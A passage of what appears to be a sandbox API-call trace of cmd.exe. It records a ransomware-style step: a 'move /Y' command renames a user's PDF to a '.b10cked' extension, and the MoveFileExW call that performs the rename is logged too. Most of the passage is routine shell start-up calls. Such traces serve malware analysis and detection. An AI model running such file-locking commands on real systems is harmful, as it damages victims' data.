| out: lpMode=0x4a9e41b0) returned 1 [0139.986] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.986] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.986] GetEnvironmentStringsW () returned 0x1f0240* [0139.986] FreeEnvironmentStringsW (penv=0x1f0240) returned 1 [0139.986] GetEnvironmentStringsW () returned 0x1f0240* [0139.986] FreeEnvironmentStringsW (penv=0x1f0240) returned 1 [0139.986] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9f4 | out: phkResult=0x16e9f4*=0x40) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0xf0, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: 
lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x0, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.986] RegCloseKey (hKey=0x40) returned 0x0 [0139.986] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9f4 | out: phkResult=0x16e9f4*=0x40) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x4) 
returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x0, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x9, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x9, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x9, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.987] RegCloseKey (hKey=0x40) returned 0x0 [0139.987] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.987] srand (_Seed=0x5b88636e) [0139.987] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"" [0139.987] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"" [0139.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.987] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f19a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.987] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.987] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.987] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.988] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.988] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.988] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.988] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.988] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.988] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.988] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.988] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.988] GetEnvironmentStringsW () returned 0x1f2390* [0139.988] FreeEnvironmentStringsW (penv=0x1f2390) returned 1 [0139.988] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.988] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.988] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.988] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.988] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.988] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.988] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.988] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.988] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.988] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f7c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f7c0, lpFilePart=0x16f7bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f7bc*="Desktop") returned 0x18 [0139.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.989] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f53c | out: lpFindFileData=0x16f53c) returned 0x1f00d0 [0139.989] FindClose (in: hFindFile=0x1f00d0 | out: hFindFile=0x1f00d0) returned 1 [0139.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f53c | out: lpFindFileData=0x16f53c) returned 0x1f00d0 [0139.989] FindClose (in: hFindFile=0x1f00d0 | out: hFindFile=0x1f00d0) returned 1 [0139.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f53c | out: lpFindFileData=0x16f53c) returned 0x1f00d0 [0139.989] FindClose (in: hFindFile=0x1f00d0 | out: hFindFile=0x1f00d0) returned 1 [0139.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.989] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.989] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.989] GetEnvironmentStringsW () returned 0x1f2bb0* 
[0139.989] FreeEnvironmentStringsW (penv=0x1f2bb0) returned 1 [0139.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.990] GetConsoleOutputCP () returned 0x1b5 [0139.990] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.990] GetUserDefaultLCID () returned 0x409 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f900, cchData=128 | out: lpLCData="0") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f900, cchData=128 | out: lpLCData="0") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f900, cchData=128 | out: lpLCData="1") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.991] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.992] GetConsoleTitleW (in: lpConsoleTitle=0x1e0958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.992] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.992] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.992] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.992] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.992] _wcsicmp (_String1="move", _String2=")") returned 68 [0139.993] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0139.993] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0139.993] _wcsicmp (_String1="IF", _String2="move") returned -4 [0139.993] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0139.993] _wcsicmp (_String1="REM", _String2="move") returned 5 [0139.993] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0139.996] GetConsoleTitleW (in: lpConsoleTitle=0x16f5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.997] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0139.997] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0139.997] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="CD") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="REN") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0139.997] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0139.997] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0139.997] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0139.997] _wcsicmp (_String1="move", _String2="MD") returned 11 [0139.997] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0139.997] _wcsicmp (_String1="move", _String2="RD") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0139.997] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0139.997] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0139.997] _wcsicmp (_String1="move", _String2="VER") returned -9 [0139.997] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0139.997] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0139.997] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0139.997] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0139.997] _wcsicmp (_String1="move", _String2="START") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0139.997] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0139.999] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.999] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.999] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f3b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f3ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f3ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.000] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.000] _wcsicmp (_String1="TGRDF2~1.PDF", _String2=".") returned 70 [0140.000] _wcsicmp (_String1="TGRDF2~1.PDF", _String2="..") returned 70 [0140.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2~1.pdf")) returned 0x20 [0140.000] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1f20d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.000] SetErrorMode (uMode=0x0) returned 0x0 [0140.000] SetErrorMode (uMode=0x1) returned 0x0 [0140.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", nBufferLength=0x104, lpBuffer=0x16ed3c, lpFilePart=0x16ed24 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", lpFilePart=0x16ed24*="TGRDF2~1.PDF") returned 0x48 [0140.001] SetErrorMode (uMode=0x0) returned 0x1 [0140.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x12 [0140.001] _wcsicmp (_String1="TGRDF2~1.PDF", _String2=".") returned 70 [0140.001] _wcsicmp (_String1="TGRDF2~1.PDF", _String2="..") returned 70 [0140.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2~1.pdf")) returned 0x20 [0140.001] SetErrorMode (uMode=0x0) returned 0x0 [0140.001] SetErrorMode (uMode=0x1) returned 0x0 [0140.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", nBufferLength=0x104, lpBuffer=0x16f1b8, lpFilePart=0x16ef50 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", lpFilePart=0x16ef50*="TGRDF2~1.PDF") returned 0x48 [0140.001] SetErrorMode (uMode=0x0) returned 0x1 [0140.001] SetErrorMode (uMode=0x0) returned 0x0 [0140.001] SetErrorMode (uMode=0x1) returned 0x0 [0140.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x16f3c0, lpFilePart=0x16ef50 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", lpFilePart=0x16ef50*="tgRDf2UBQ_aR.pdf.b10cked") returned 0x54 [0140.001] SetErrorMode (uMode=0x0) returned 0x1 [0140.001] SetLastError (dwErrCode=0x0) [0140.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf.b10cked")) returned 0xffffffff [0140.001] GetLastError () returned 0x2 [0140.001] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x16e8cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e8cc) returned 0x1f22e8 [0140.001] FindNextFileW (in: hFindFile=0x1f22e8, lpFindFileData=0x16e8cc | out: lpFindFileData=0x16e8cc) returned 0 [0140.002] GetLastError () returned 0x12 [0140.002] FindClose (in: hFindFile=0x1f22e8 | out: hFindFile=0x1f22e8) returned 1 [0140.760] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", fInfoLevelId=0x1, lpFindFileData=0x1f1e78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f1e78) returned 0x1f22e8 [0140.760] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", nBufferLength=0x104, lpBuffer=0x16eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked", lpFilePart=0x0) returned 0x54 [0140.760] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf", nBufferLength=0x104, lpBuffer=0x16eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf", lpFilePart=0x0) returned 0x4c [0140.760] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf")) returned 0x20 [0140.760] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2ubq_ar.pdf.b10cked"), dwFlags=0x3) returned 1 [0140.761] FindClose (in: hFindFile=0x1f22e8 | out: hFindFile=0x1f22e8) returned 1 [0140.761] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16eb18 | out: _Buffer=" 1") returned 9 [0140.761] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.761] GetFileType (hFile=0x7) returned 0x2 [0140.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.761] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eaa4 | out: lpMode=0x16eaa4) returned 1 [0140.761] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.761] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ead8 | out: lpConsoleScreenBufferInfo=0x16ead8) returned 1 [0140.762] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.762] FormatMessageW (in: dwFlags=0x1800, 